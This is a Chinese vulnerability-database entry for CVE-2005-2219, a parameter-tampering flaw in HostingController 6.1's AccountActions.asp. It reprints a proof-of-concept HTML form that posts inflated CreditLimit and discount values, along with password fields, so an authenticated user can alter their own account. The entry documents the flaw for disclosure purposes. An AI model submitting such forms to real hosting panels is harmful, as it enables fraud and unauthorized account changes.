HostingController AccountActions.asp 数据篡改漏洞

HostingController AccountActions.asp 数据篡改漏洞

漏洞ID 1108925 漏洞类型 未知
发布时间 2005-07-10 更新时间 2005-07-12
图片[1]-HostingController AccountActions.asp 数据篡改漏洞-安全小百科CVE编号 CVE-2005-2219
图片[2]-HostingController AccountActions.asp 数据篡改漏洞-安全小百科CNNVD-ID CNNVD-200507-123
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/1096
https://www.securityfocus.com/bid/89748
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-123
|漏洞详情
HostingController是一套Web站点管理系统。HostingController6.1Hotfix2.1版本存在漏洞。远程认证用户可通过直接请求AccountActions.asp并修改UpdateCreditLimit操作中的CreditLimit参数,执行未经授权的操作,例如修改信用额度。
|漏洞EXP
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated 
user can change his/her credit and buy some services!

Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.
Exploit code to proof:
--------------------------------
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value=""></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>

# milw0rm.com [2005-07-10]
|受影响的产品
Hosting Controller Hosting Controller 6.1.0 Hotfix 3.2 6.1 Hotfix 2.1
|参考资料

来源:SECTRACK
名称:1014443
链接:http://securitytracker.com/id?1014443

相关推荐: Darwin Kernel Mach File Parsing Local Integer Overflow Vulnerability

Darwin Kernel Mach File Parsing Local Integer Overflow Vulnerability 漏洞ID 1097274 漏洞类型 Boundary Condition Error 发布时间 2005-01-19 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享